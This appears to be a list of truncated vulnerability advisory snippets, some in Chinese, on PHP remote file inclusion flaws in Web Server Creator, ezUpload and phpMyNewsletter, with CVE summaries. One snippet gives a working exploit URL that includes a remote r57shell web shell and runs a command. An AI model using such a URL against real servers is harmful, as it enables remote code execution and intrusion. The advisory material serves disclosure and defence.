Web Server Creator Customize.PHP参数远程文件包含漏洞

Web Server Creator是一款基于PHP的站点架构程序。 Web Server Creator不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'Customize.PHP'脚本对用户提交的'l'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 comscripts.com Web Server Creator 0.1 目前没有解决方案提供,请关注以下链接： http://www.comscripts.com/jump.php?action=script&id=1082...

Web Server Creator v0.1 (l) Remote Include Vulnerability

No description provided by source. Web Server Creator v0.1 l Remote Include Vulnerability Author: XORON URL: http://www.comscripts.com/jump.php?action=script&id=1082 Class: Remote cont@ct: x0r0nathotmaildotcom Code: include $l; Exploit:...

multiple file include exploits in EzUpload Pro v2.10

multiple file include exploits in EzUpload Pro v2.10 forum type : EzUpload Pro v2.10 bug found by : black-code & sweet-devil team : site-down type : file include exploits : form.php http://www.example.com/path/form.php?path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd customize.php...

CVE-2005-2616

Multiple PHP file include vulnerabilities in ezUpload 2.2 allow remote attackers to execute arbitrary code via the path parameter to 1 initialize.php, 2 customize.php, 3 form.php, or 4 index.php...

ezUpload 2.2 - customize.php?path Remote File Inclusion

ezUpload 2.2 - customize.php?path Remote File Inclusion source: https://www.securityfocus.com/bid/14534/info ezUpload is affected by multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverag...

ezUpload 2.2 - 'customize.php?path' Remote File Inclusion

source: https://www.securityfocus.com/bid/14534/info ezUpload is affected by multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage any of these issues to execute arbitrary server-side...

CVE-2002-1887

PHP remote file inclusion vulnerability in customize.php for phpMyNewsletter 0.6.10 allows remote attackers to execute arbitrary PHP code via the l parameter...

CVE-2002-1887

PHP remote file inclusion in phpMyNewsletter 0.6.10 via customize.php (l parameter) allows remote code execution. Affected software: phpMyNewsletter 0.6.10; vulnerability arises from PHP include handling in customize.php. CVSSv2 base score 7.5 (HIGH) with network attack vector, low attack complex...

CVE-2002-1887

PHP remote file inclusion vulnerability in customize.php for phpMyNewsletter 0.6.10 allows remote attackers to execute arbitrary PHP code via the l parameter...

Web Server Creator Web Portal 0.1 - Remote File Inclusion

Web Server Creator Web Portal 0.1 - Remote File Inclusion source: https://www.securityfocus.com/bid/6251/info The Web Server Creator Web Portal is prone to an issue which may allow attackers to include arbitrary files from a remote server. It is possible for remote attackers to influence the...